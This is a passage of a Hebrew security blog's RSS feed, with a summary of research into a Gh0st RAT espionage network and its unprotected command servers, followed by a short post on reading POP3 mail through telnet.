<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">כאמור, החוקרים הצליחו לזהות את שרתי הפיקוד על סמך התקשורת שלכדו במשרדי </span><span dir="ltr">OHHDL</span><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">.</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">הם הצליחו למצוא ממשק ניהול </span><span dir="ltr">WEB</span><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">י על אחד השרתים. שרת זה הכיל קישורים לשרתי פיקודים אחרים ולכן יכלו להשיג גישה לשרתים נוספים.</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">(ישנם שני סוגים של שרתים – </span><span dir="ltr">controls servers</span><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"> ו-</span><span dir="ltr">command servers</span><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">).</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"> </span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">לאחר מכן החוקרים הקימו </span><span dir="ltr">honey pot</span><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;"> <span lang="HE">– מחשב שייעדו שידבק ועל ידי כך יזהו מה קורה בזמן ההדבקה והפעילות של הסוס.</span></span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">הם הצליחו להדביק את המחשב ע&quot;י שימוש בממשק ה-</span><span dir="ltr">WEB</span><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"> של השרת ושתלו עליו </span><span dir="ltr">Gh0st RAT</span><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">.</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">לאחר זמן מה המחשב יצר קשר בהצלחה עם ה-</span><span dir="ltr">CLIENT</span><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;"> <span lang="HE">שלו (התוקף).</span></span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">כשהתוקף שלח פקודות למחשב, גילו שהתוקף משתמש בחיבור </span><span dir="ltr">DSL</span><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"> ב-</span><span dir="ltr">Hainan Island</span><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">.</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"> </span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">על ארבעת ה-</span><span dir="ltr">control servers</span><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;"> <span lang="HE">נמצאו 26</span></span><span dir="ltr" lang="HE"> </span><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">מקומות בהם היה ממשק פיקוד.</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">החוקרים מצאו אותם ע&quot;י ניחוש שמות ומיקומי קבצים.</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">אין לחוקרים מושג מדוע לא אובטחו הממשקים האלה.</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">מה היה בממשק הפיקוד?</span></p>
<p class="MsoListParagraph" style="text-indent: -18pt;" dir="rtl"><!--[if !supportLists]--><span style="font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;"><span>1.<span style="font-family: &quot;Times New Roman&quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span><!--[endif]--><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">רשימת המחשבים הנגועים.</span></p>
<p class="MsoListParagraph" style="text-indent: -18pt;" dir="rtl"><!--[if !supportLists]--><span><span>2.<span style="font-family: &quot;Times New Roman&quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span><!--[endif]--><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">ממשק לשליחת פיקודים חדשים</span></p>
<p class="MsoListParagraph" style="text-indent: -18pt;" dir="rtl"><!--[if !supportLists]--><span><span>3.<span style="font-family: &quot;Times New Roman&quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span><!--[endif]--><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">רשימת הפיקודים הממתינים ותוצאות שלהם כשהם סיימו לרוץ.</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"> </span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">מסקנות:</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">אני חייב לציין שלמרות שיש יותר פרטים – אין עדות אמיתית לכך שמדובר בגוף ביון או גוף שמופעל ע&quot;י מדינה.</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">זה אמנם מתקבל על הדעת בגלל סוג המחשבים שהותקפו  אך בדיוק באותה מידה זה יכול להיות גוף הקשור לריגול תעשייתי או למאפיה הסינית או אפילו סתם להאקר טוב ומשועמם מאוד.</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">המחקר עצמו מעניין מאוד ונראה שהחוקרים עשו עבודה מאוד מקיפה (מה שאי אפשר היה להגיד לאחר ה-</span><span dir="ltr">PDF</span><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"> הקודם).</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">יפה לראות שהחוקרים עצמם הצליחו לקבל שליטה על שרתי הפיקוד של הסוס.</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">מדהים ששרתי הפיקוד לא היו מוגנים. גם האקר צריך לעבוד חכם ובזהירות.</span></p>
<p class="MsoNoSpacing" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"> </span></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1023&crtId=148&dt=1257940434"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1023/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1023?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫איך קוראים מייל דרך telnet?‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/8TxzW10K_M4/1020</link>
		<comments>http://www.hacking.org.il/1020#comments</comments>
		<pubDate>Sun, 10 May 2009 02:34:45 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[מאמרים מקוריים]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1020</guid>
		<description><![CDATA[&#8235;סתם כי מישהו שאל בפורומים:
telnet mailserver.domain 110
אחרי שהוא ענה:
user yourusername
קיבלנו חזרה OK.
pass yourpassword
אם הסיסמה נכונה &#8211; נקבל OK ואת כמות ההודעות בתיבה.
list
יראה לנו את רשימת המיילים.
retr יאפשר לנו למשוך ולקרוא את הההודעות.
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1020&crtId=148&dt=1257940434">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>סתם כי מישהו שאל בפורומים:</p>
<p>telnet mailserver.domain 110</p>
<p>אחרי שהוא ענה:</p>
<p>user yourusername</p>
<p>קיבלנו חזרה OK.</p>
<p>pass yourpassword</p>
<p>אם הסיסמה נכונה &#8211; נקבל OK ואת כמות ההודעות בתיבה.</p>
<p>list</p>
<p>יראה לנו את רשימת המיילים.</p>
<p>retr יאפשר לנו למשוך ולקרוא את הההודעות.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1020&crtId=148&dt=1257940434"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1020/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1020?nucrss=1</feedburner:origLink></item>
	</channel>
</rss>
